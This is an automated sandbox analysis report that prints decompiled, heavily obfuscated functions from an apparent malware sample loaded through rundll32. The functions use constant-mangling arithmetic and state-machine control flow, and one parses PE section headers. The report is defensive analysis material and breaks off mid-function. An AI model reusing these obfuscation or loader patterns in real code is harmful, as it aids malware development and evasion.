                                                                                                                      0x006a167c
                                                                                                                      0x006a1684
                                                                                                                      0x006a1687
                                                                                                                      0x006a168d
                                                                                                                      0x006a1693
                                                                                                                      0x006a1696
                                                                                                                      0x006a169c
                                                                                                                      0x006a16b0
                                                                                                                      0x006a16ba
                                                                                                                      0x006a16c4
                                                                                                                      0x006a16cc

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !h$5M$d,
                                                                                                                      • API String ID: 0-3324333736
                                                                                                                      • Opcode ID: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                      • Instruction ID: f7036d69ced8bb6203fad6c1e9236df0eb42dea3b208df54c18865453da4f76c
                                                                                                                      • Opcode Fuzzy Hash: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                      • Instruction Fuzzy Hash: E991CEB140038C9BCF58DF65C98A9DE3FB1BB04358F509219FE2A96260D7B5C999CF84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E0069DEDC(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                                                                                      				char _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				void* _t132;
                                                                                                                      				signed int _t152;
                                                                                                                      				signed int _t154;
                                                                                                                      				signed int _t155;
                                                                                                                      				void* _t158;
                                                                                                                      				signed int* _t175;
                                                                                                                      				void* _t177;
                                                                                                                      				void* _t178;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_t174 = _a12;
                                                                                                                      				_t175 = __ecx;
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t132);
                                                                                                                      				_v68 = 0x4bd93;
                                                                                                                      				_t178 = _t177 + 0x18;
                                                                                                                      				_v68 = _v68 << 0xc;
                                                                                                                      				_v68 = _v68 ^ 0x4bd93000;
                                                                                                                      				_t158 = 0xc7349d4;
                                                                                                                      				_v72 = 0xdd086a;
                                                                                                                      				_v72 = _v72 + 0xe602;
                                                                                                                      				_v72 = _v72 ^ 0x00de9932;
                                                                                                                      				_v80 = 0x3b4fac;
                                                                                                                      				_v80 = _v80 | 0x3fbbffff;
                                                                                                                      				_v80 = _v80 ^ 0x3fb1db7a;
                                                                                                                      				_v84 = 0xeaa49b;
                                                                                                                      				_v84 = _v84 | 0xeaf55708;
                                                                                                                      				_v84 = _v84 ^ 0x8a8b7318;
                                                                                                                      				_v84 = _v84 ^ 0x607b886d;
                                                                                                                      				_v88 = 0x47a;
                                                                                                                      				_v88 = _v88 << 0x10;
                                                                                                                      				_v88 = _v88 << 7;
                                                                                                                      				_v88 = _v88 ^ 0x3d0d9eb4;
                                                                                                                      				_v92 = 0xf1af5e;
                                                                                                                      				_v92 = _v92 >> 0xc;
                                                                                                                      				_t154 = 0x35;
                                                                                                                      				_v92 = _v92 * 0x55;
                                                                                                                      				_v92 = _v92 ^ 0x000492d7;
                                                                                                                      				_v104 = 0x9f0b47;
                                                                                                                      				_v104 = _v104 + 0xffffc934;
                                                                                                                      				_v104 = _v104 ^ 0x723421f7;
                                                                                                                      				_v104 = _v104 | 0x7192d654;
                                                                                                                      				_v104 = _v104 ^ 0x73b08a7e;
                                                                                                                      				_v100 = 0x1207d9;
                                                                                                                      				_v100 = _v100 + 0x7e1b;
                                                                                                                      				_v100 = _v100 | 0x7b677906;
                                                                                                                      				_v100 = _v100 * 0xf;
                                                                                                                      				_v100 = _v100 ^ 0x3c0b4b50;
                                                                                                                      				_v60 = 0x5b441e;
                                                                                                                      				_v60 = _v60 ^ 0x5c22d9cd;
                                                                                                                      				_v60 = _v60 ^ 0x5c7ef938;
                                                                                                                      				_v64 = 0xefe367;
                                                                                                                      				_v64 = _v64 + 0x4581;
                                                                                                                      				_v64 = _v64 ^ 0x00f6697a;
                                                                                                                      				_v76 = 0x71c375;
                                                                                                                      				_t155 = 0x14;
                                                                                                                      				_v76 = _v76 / _t154;
                                                                                                                      				_v76 = _v76 + 0xaf56;
                                                                                                                      				_v76 = _v76 ^ 0x000ba048;
                                                                                                                      				_v48 = 0x1a9f92;
                                                                                                                      				_v48 = _v48 + 0x9d50;
                                                                                                                      				_v48 = _v48 ^ 0x001d37d0;
                                                                                                                      				_v52 = 0xf5c688;
                                                                                                                      				_v52 = _v52 + 0xffff5f34;
                                                                                                                      				_v52 = _v52 ^ 0x00ffa10c;
                                                                                                                      				_v56 = 0x3cec64;
                                                                                                                      				_v56 = _v56 ^ 0x003949c0;
                                                                                                                      				_v96 = 0x7057ec;
                                                                                                                      				_v96 = _v96 * 0x35;
                                                                                                                      				_v96 = _v96 | 0xca3e56e5;
                                                                                                                      				_v96 = _v96 / _t155;
                                                                                                                      				_v96 = _v96 ^ 0x0b2d80e0;
                                                                                                                      				do {
                                                                                                                      					while(_t158 != 0x254c3a7) {
                                                                                                                      						if(_t158 == 0x324cad4) {
                                                                                                                      							E00690DAF(_v100,  &_v44, _v60,  *_t174, _v64, _v76);
                                                                                                                      							_t178 = _t178 + 0x10;
                                                                                                                      							_t158 = 0xd972b83;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t158 == 0xc7349d4) {
                                                                                                                      								_t158 = 0x254c3a7;
                                                                                                                      								 *_t175 =  *_t175 & 0x00000000;
                                                                                                                      								_t175[1] = _v68;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t158 == 0xd972b83) {
                                                                                                                      									E006A0E3A( &_v44, _v48, __eflags, _v52, _v56, _v96, _t174 + 4);
                                                                                                                      								} else {
                                                                                                                      									if(_t158 == 0xecd5bc1) {
                                                                                                                      										_push(_t158);
                                                                                                                      										_push(_t158);
                                                                                                                      										_t152 = E00687FF2(_t175[1]);
                                                                                                                      										 *_t175 = _t152;
                                                                                                                      										__eflags = _t152;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_t158 = 0xfbc7198;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t158 != 0xfbc7198) {
                                                                                                                      											goto L13;
                                                                                                                      										} else {
                                                                                                                      											E00683DBC( &_v44, _t175, _v88, _v92, _v104);
                                                                                                                      											_t178 = _t178 + 0xc;
                                                                                                                      											_t158 = 0x324cad4;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L16:
                                                                                                                      						__eflags =  *_t175;
                                                                                                                      						_t131 =  *_t175 != 0;
                                                                                                                      						__eflags = _t131;
                                                                                                                      						return 0 | _t131;
                                                                                                                      					}
                                                                                                                      					_t175[1] = E0069AC3A(_t174);
                                                                                                                      					_t158 = 0xecd5bc1;
                                                                                                                      					L13:
                                                                                                                      					__eflags = _t158 - 0x72dd7bf;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L16;
                                                                                                                      			}




























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: d<$g$Wp
                                                                                                                      • API String ID: 0-355099142
                                                                                                                      • Opcode ID: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                      • Instruction ID: 7fa72f499e546ebe6760510caff646df16714ebfe5bb926926156b9f7179e50f
                                                                                                                      • Opcode Fuzzy Hash: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                      • Instruction Fuzzy Hash: 617143B10093419FDB64CF61C48942BBBF6FBC9748F10891DF29A96620D3768A4ACF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E0069C3A0(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				void* _t137;
                                                                                                                      				void* _t149;
                                                                                                                      				void* _t159;
                                                                                                                      				void* _t161;
                                                                                                                      				signed int _t163;
                                                                                                                      				signed int _t164;
                                                                                                                      				signed int _t165;
                                                                                                                      				signed int _t166;
                                                                                                                      				signed int _t167;
                                                                                                                      				void* _t188;
                                                                                                                      				void* _t193;
                                                                                                                      				intOrPtr* _t195;
                                                                                                                      				signed int* _t197;
                                                                                                                      				signed int* _t198;
                                                                                                                      				signed int* _t199;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_t195 = __ecx;
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t137);
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_v12 = 0x8437e8;
                                                                                                                      				_v8 = 0xdb9720;
                                                                                                                      				_v60 = 0xf5e956;
                                                                                                                      				_v60 = _v60 << 0xc;
                                                                                                                      				_t163 = 0x6b;
                                                                                                                      				_v60 = _v60 / _t163;
                                                                                                                      				_v60 = _v60 | 0x488cc8ef;
                                                                                                                      				_v60 = _v60 ^ 0x48eedbff;
                                                                                                                      				_v44 = 0x82c5a5;
                                                                                                                      				_v44 = _v44 | 0x04b6a6f1;
                                                                                                                      				_t164 = 0x4a;
                                                                                                                      				_v44 = _v44 * 0x6a;
                                                                                                                      				_v44 = _v44 ^ 0xf3bc2b72;
                                                                                                                      				_v40 = 0x882fad;
                                                                                                                      				_v40 = _v40 ^ 0x709d76bd;
                                                                                                                      				_v40 = _v40 + 0xffff52d2;
                                                                                                                      				_v40 = _v40 ^ 0x7014aba2;
                                                                                                                      				_v28 = 0x22e756;
                                                                                                                      				_v28 = _v28 + 0x769a;
                                                                                                                      				_v28 = _v28 ^ 0x002bcc4a;
                                                                                                                      				_v64 = 0xc290d0;
                                                                                                                      				_v64 = _v64 + 0xffff641a;
                                                                                                                      				_v64 = _v64 << 0xd;
                                                                                                                      				_v64 = _v64 ^ 0xbd78a131;
                                                                                                                      				_v64 = _v64 ^ 0x83ed8c94;
                                                                                                                      				_v32 = 0x78b1b0;
                                                                                                                      				_v32 = _v32 << 0xe;
                                                                                                                      				_v32 = _v32 ^ 0x2c621b2d;
                                                                                                                      				_v36 = 0xa1b61f;
                                                                                                                      				_v36 = _v36 + 0xb017;
                                                                                                                      				_v36 = _v36 | 0xc1836c3e;
                                                                                                                      				_v36 = _v36 ^ 0xc1a0ee75;
                                                                                                                      				_v56 = 0x2861cb;
                                                                                                                      				_v56 = _v56 / _t164;
                                                                                                                      				_v56 = _v56 << 0xd;
                                                                                                                      				_t165 = 0x1b;
                                                                                                                      				_v56 = _v56 / _t165;
                                                                                                                      				_v56 = _v56 ^ 0x00aa9f16;
                                                                                                                      				_v24 = 0x4a8582;
                                                                                                                      				_v24 = _v24 | 0x39704e96;
                                                                                                                      				_v24 = _v24 ^ 0x397cf0ca;
                                                                                                                      				_v52 = 0x9fdf3f;
                                                                                                                      				_v52 = _v52 | 0x733ecb9c;
                                                                                                                      				_v52 = _v52 >> 0x10;
                                                                                                                      				_t166 = 0x2c;
                                                                                                                      				_v52 = _v52 / _t166;
                                                                                                                      				_v52 = _v52 ^ 0x0002453b;
                                                                                                                      				_v20 = 0x70cd9;
                                                                                                                      				_v20 = _v20 ^ 0x0384d77a;
                                                                                                                      				_v20 = _v20 ^ 0x03811849;
                                                                                                                      				_v16 = 0x6ca56e;
                                                                                                                      				_v16 = _v16 * 0x1c;
                                                                                                                      				_v16 = _v16 ^ 0x0be055d0;
                                                                                                                      				_v48 = 0x383b50;
                                                                                                                      				_v48 = _v48 + 0xe78c;
                                                                                                                      				_v48 = _v48 + 0x7960;
                                                                                                                      				_v48 = _v48 + 0xffff251b;
                                                                                                                      				_v48 = _v48 ^ 0x003eca00;
                                                                                                                      				_t167 = _v28;
                                                                                                                      				_t149 = E0068474F(_t167, __ecx, _v64, _v32);
                                                                                                                      				_t159 = _t149;
                                                                                                                      				_t197 =  &(( &_v64)[8]);
                                                                                                                      				if(_t159 != 0) {
                                                                                                                      					_push(_t167);
                                                                                                                      					_t188 = E0068A3A3( *((intOrPtr*)(_t159 + 0x50)), _v36, _v56, _v24, _v40, _v44 | _v60);
                                                                                                                      					_t198 =  &(_t197[5]);
                                                                                                                      					if(_t188 == 0) {
                                                                                                                      						L6:
                                                                                                                      						return _t188;
                                                                                                                      					}
                                                                                                                      					E0068ED7E(_v52, _t188, _v20,  *__ecx,  *((intOrPtr*)(_t159 + 0x54)));
                                                                                                                      					_t199 =  &(_t198[3]);
                                                                                                                      					_t193 = ( *(_t159 + 0x14) & 0x0000ffff) + 0x18 + _t159;
                                                                                                                      					_t161 = ( *(_t159 + 6) & 0x0000ffff) * 0x28 + _t193;
                                                                                                                      					while(_t193 < _t161) {
                                                                                                                      						_t157 =  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10));
                                                                                                                      						E0068ED7E(_v16,  *((intOrPtr*)(_t193 + 0xc)) + _t188, _v48,  *((intOrPtr*)(_t193 + 0x14)) +  *_t195,  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10)));
                                                                                                                      						_t199 =  &(_t199[3]);
                                                                                                                      						_t193 = _t193 + 0x28;
                                                                                                                      					}
                                                                                                                      					goto L6;
                                                                                                                      				}
                                                                                                                      				return _t149;
                                                                                                                      			}



































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: P;8$V"$`y
                                                                                                                      • API String ID: 0-4109183828
                                                                                                                      • Opcode ID: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                      • Instruction ID: d4324cd0340527e4578365d03fa73042bf0e8b5c11d5a6647aa4c0cf3ab51ab7
                                                                                                                      • Opcode Fuzzy Hash: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                      • Instruction Fuzzy Hash: E06155B15083409FC354CF66C88991BBBF2FBC8718F008A1CF69A96260D7B2D919CF06
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00681A56(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				char _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				void* _t86;
                                                                                                                      				void* _t100;
                                                                                                                      				void* _t101;
                                                                                                                      				void* _t103;
                                                                                                                      				void* _t115;
                                                                                                                      				void* _t116;
                                                                                                                      				signed int _t117;
                                                                                                                      				void* _t119;
                                                                                                                      				void* _t120;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_t115 = __edx;
                                                                                                                      				_t101 = __ecx;
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t86);
                                                                                                                      				_v72 = 0xccde8a;
                                                                                                                      				_t120 = _t119 + 0x10;
                                                                                                                      				_v72 = _v72 | 0xfb673ead;
                                                                                                                      				_v72 = _v72 + 0xedb6;
                                                                                                                      				_t116 = 0;
                                                                                                                      				_v72 = _v72 + 0xffff76c0;
                                                                                                                      				_t103 = 0x3303944;
                                                                                                                      				_v72 = _v72 ^ 0xfbf43e98;
                                                                                                                      				_v48 = 0xd56f6c;
                                                                                                                      				_v48 = _v48 ^ 0x96c3cc23;
                                                                                                                      				_v48 = _v48 ^ 0x96174539;
                                                                                                                      				_v76 = 0xdcf6fd;
                                                                                                                      				_v76 = _v76 + 0xffffee01;
                                                                                                                      				_t117 = 0x65;
                                                                                                                      				_v76 = _v76 * 0x23;
                                                                                                                      				_v76 = _v76 + 0xffff4e11;
                                                                                                                      				_v76 = _v76 ^ 0x1e3c7761;
                                                                                                                      				_v80 = 0x144f78;
                                                                                                                      				_v80 = _v80 * 0x39;
                                                                                                                      				_v80 = _v80 ^ 0xe273dc44;
                                                                                                                      				_v80 = _v80 >> 5;
                                                                                                                      				_v80 = _v80 ^ 0x073b5be1;
                                                                                                                      				_v52 = 0xb4a3bb;
                                                                                                                      				_v52 = _v52 ^ 0x916b14c7;
                                                                                                                      				_v52 = _v52 ^ 0x91dd676b;
                                                                                                                      				_v68 = 0x8d73f0;
                                                                                                                      				_v68 = _v68 >> 0xe;
                                                                                                                      				_v68 = _v68 * 0x1c;
                                                                                                                      				_v68 = _v68 ^ 0x0000c864;
                                                                                                                      				_v56 = 0xe6cb06;
                                                                                                                      				_v56 = _v56 >> 4;
                                                                                                                      				_v56 = _v56 | 0x1af2f565;
                                                                                                                      				_v56 = _v56 ^ 0x1af384df;
                                                                                                                      				_v60 = 0x4f2325;
                                                                                                                      				_t55 =  &_v60; // 0x4f2325
                                                                                                                      				_v60 =  *_t55 * 0x78;
                                                                                                                      				_t57 =  &_v60; // 0x4f2325
                                                                                                                      				_v60 =  *_t57 / _t117;
                                                                                                                      				_v60 = _v60 ^ 0x0059a097;
                                                                                                                      				_v64 = 0xa290a2;
                                                                                                                      				_v64 = _v64 >> 4;
                                                                                                                      				_v64 = _v64 + 0x6f89;
                                                                                                                      				_v64 = _v64 ^ 0x00044b6b;
                                                                                                                      				while(_t103 != 0x3303944) {
                                                                                                                      					if(_t103 == 0x5a97fa2) {
                                                                                                                      						__eflags = E0069D97D( &_v44, _v56, __eflags, _v60, _t115 + 0x30, _v64);
                                                                                                                      						_t116 =  !=  ? 1 : _t116;
                                                                                                                      					} else {
                                                                                                                      						if(_t103 == 0xa5a4144) {
                                                                                                                      							E00683DBC( &_v44, _t101, _v72, _v48, _v76);
                                                                                                                      							_t120 = _t120 + 0xc;
                                                                                                                      							_t103 = 0xf0cd209;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t103 != 0xf0cd209) {
                                                                                                                      								L9:
                                                                                                                      								__eflags = _t103 - 0x1b06c67;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								_t100 = E00682A21(_v80, _v52,  &_v44, _t115 + 0x38, _v68);
                                                                                                                      								_t120 = _t120 + 0xc;
                                                                                                                      								if(_t100 != 0) {
                                                                                                                      									_t103 = 0x5a97fa2;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t116;
                                                                                                                      				}
                                                                                                                      				_t103 = 0xa5a4144;
                                                                                                                      				goto L9;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %#O$DAZ$DAZ
                                                                                                                      • API String ID: 0-2081751441
                                                                                                                      • Opcode ID: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                      • Instruction ID: 2163a8bd31a30dde7a9d3ed5d03f43548f46e9d0eb281523d24ad4c3644ca8de
                                                                                                                      • Opcode Fuzzy Hash: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                      • Instruction Fuzzy Hash: 925166715083019FC758DF25D98585FBBE5FBD8708F500A2DF586A6220D375CA0A8B87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E006A0C14(void* __ecx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				void* _t111;
                                                                                                                      				void* _t115;
                                                                                                                      				void* _t116;
                                                                                                                      				signed int _t118;
                                                                                                                      				void* _t124;
                                                                                                                      				void* _t125;
                                                                                                                      				signed int* _t127;
                                                                                                                      
                                                                                                                      				_t127 =  &_v44;
                                                                                                                      				_t116 = __ecx;
                                                                                                                      				_v24 = 0x2b1199;
                                                                                                                      				_v24 = _v24 + 0x4ba2;
                                                                                                                      				_v24 = _v24 << 0xa;
                                                                                                                      				_v24 = _v24 ^ 0xad737bf1;
                                                                                                                      				_v44 = 0xc9a4fe;
                                                                                                                      				_v44 = _v44 << 0xe;
                                                                                                                      				_v44 = _v44 | 0xe69540e1;
                                                                                                                      				_v44 = _v44 + 0xffffff88;
                                                                                                                      				_v44 = _v44 ^ 0xefbb2da7;
                                                                                                                      				_v28 = 0xedc73;
                                                                                                                      				_v28 = _v28 + 0xffff2701;
                                                                                                                      				_v28 = _v28 + 0x8bbf;
                                                                                                                      				_v28 = _v28 ^ 0x00055e2c;
                                                                                                                      				_v16 = 0xf95115;
                                                                                                                      				_v16 = _v16 | 0x79ce56df;
                                                                                                                      				_v16 = _v16 + 0xffff5817;
                                                                                                                      				_v16 = _v16 ^ 0x79f40a5c;
                                                                                                                      				_v36 = 0x520750;
                                                                                                                      				_v36 = _v36 << 7;
                                                                                                                      				_v36 = _v36 ^ 0x4f263ebd;
                                                                                                                      				_v36 = _v36 * 6;
                                                                                                                      				_v36 = _v36 ^ 0x64ef8369;
                                                                                                                      				_t124 = 0;
                                                                                                                      				_v40 = 0xccfebc;
                                                                                                                      				_t125 = 0x2aa38ff;
                                                                                                                      				_v40 = _v40 + 0xbaf7;
                                                                                                                      				_t118 = 0xd;
                                                                                                                      				_v40 = _v40 * 0x5e;
                                                                                                                      				_v40 = _v40 + 0x6a66;
                                                                                                                      				_v40 = _v40 ^ 0x4b80704d;
                                                                                                                      				_v20 = 0xba2b89;
                                                                                                                      				_v20 = _v20 + 0xa093;
                                                                                                                      				_v20 = _v20 / _t118;
                                                                                                                      				_v20 = _v20 ^ 0x000a03fd;
                                                                                                                      				_v32 = 0xb0f3b0;
                                                                                                                      				_v32 = _v32 + 0x50dc;
                                                                                                                      				_v32 = _v32 + 0xffff1629;
                                                                                                                      				_v32 = _v32 * 0x4e;
                                                                                                                      				_v32 = _v32 ^ 0x35b73aee;
                                                                                                                      				_v4 = 0x432383;
                                                                                                                      				_v4 = _v4 + 0xffff373f;
                                                                                                                      				_v4 = _v4 | 0x7532efd9;
                                                                                                                      				_v4 = _v4 ^ 0x75785e39;
                                                                                                                      				_v8 = 0x709bec;
                                                                                                                      				_v8 = _v8 + 0xffffb2bc;
                                                                                                                      				_v8 = _v8 + 0xffff08e7;
                                                                                                                      				_v8 = _v8 ^ 0x006dec69;
                                                                                                                      				_v12 = 0xe79dac;
                                                                                                                      				_v12 = _v12 * 0x78;
                                                                                                                      				_v12 = _v12 + 0xb337;
                                                                                                                      				_v12 = _v12 ^ 0x6c9daebe;
                                                                                                                      				do {
                                                                                                                      					while(_t125 != 0x2aa38ff) {
                                                                                                                      						if(_t125 == 0x81ec960) {
                                                                                                                      							_t124 = _t124 + E0069C2F8(_v32, _t116 + 0x38, _v4, _v8, _v12);
                                                                                                                      						} else {
                                                                                                                      							if(_t125 == 0xa7224d4) {
                                                                                                                      								_t118 = _v16;
                                                                                                                      								_t111 = E0069C2F8(_t118, _t116 + 0x14, _v36, _v40, _v20);
                                                                                                                      								_t127 =  &(_t127[3]);
                                                                                                                      								_t125 = 0x81ec960;
                                                                                                                      								_t124 = _t124 + _t111;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t125 != 0xcb4deb0) {
                                                                                                                      									goto L8;
                                                                                                                      								} else {
                                                                                                                      									_push(_t118);
                                                                                                                      									_push(_t118);
                                                                                                                      									_t115 = E0068474B();
                                                                                                                      									_t127 =  &(_t127[2]);
                                                                                                                      									_t125 = 0xa7224d4;
                                                                                                                      									_t124 = _t124 + _t115;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L11:
                                                                                                                      						return _t124;
                                                                                                                      					}
                                                                                                                      					_t125 = 0xcb4deb0;
                                                                                                                      					L8:
                                                                                                                      				} while (_t125 != 0x4501b46);
                                                                                                                      				goto L11;
                                                                                                                      			}






















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 9^xu$fj$im
                                                                                                                      • API String ID: 0-3261451082
                                                                                                                      • Opcode ID: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                      • Instruction ID: 19718ecb63837919f6b6b08f573e6b74216a10be3848e479fad97c190714b218
                                                                                                                      • Opcode Fuzzy Hash: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                      • Instruction Fuzzy Hash: AB5156B24083429FD784DF25D48544BBBE1BFD8368F501A1DF495A6260D3B4CA49CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E00696C49(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				intOrPtr _v56;
